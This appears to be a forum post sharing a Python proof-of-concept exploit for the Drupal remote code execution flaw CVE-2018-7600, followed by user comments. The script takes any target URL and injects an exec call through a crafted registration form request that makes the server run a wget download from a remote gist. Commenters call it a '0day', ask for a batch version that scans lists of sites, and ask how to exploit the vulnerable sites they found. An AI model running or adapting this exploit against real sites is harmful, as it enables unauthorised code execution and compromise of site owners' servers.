#!/usr/bin/env import sys import requests print ('################################################################') print ('# Proof-Of-Concept for CVE-2018-7600') print ('# by Vitalii Rudnykh') print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') print ('# https://github.com/a2u/CVE-2018-7600') print ('################################################################') print ('Provided only for educational or information purposes\n') target = input('Enter target url (example: https://domain.ltd/): ') url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://gist.githubusercontent.com/a2u/66680e1f4abac79d654424ffdb1b410d/raw/d417bbfa8137a1ef53124522a87b1ad1d2b8ec96/hello.txt'} r = requests.post(url, data=payload) if r.status_code != 200: sys.exit("Not exploitable") print ('\nCheck: '+target+'hello.txt')
使劲撸吧。
ajoy4u
发表于 2018-4-13
望洋兴叹
评论列表
加载数据中...
m5n31
发表于 2018-4-13
老农哥能写成工具吗,可批量导入网址的。
评论列表
加载数据中...
100aff
发表于 2018-4-13
卧槽,这个0day好牛逼啊。
不过扫出来一堆,怎么利用呢?
评论列表
加载数据中...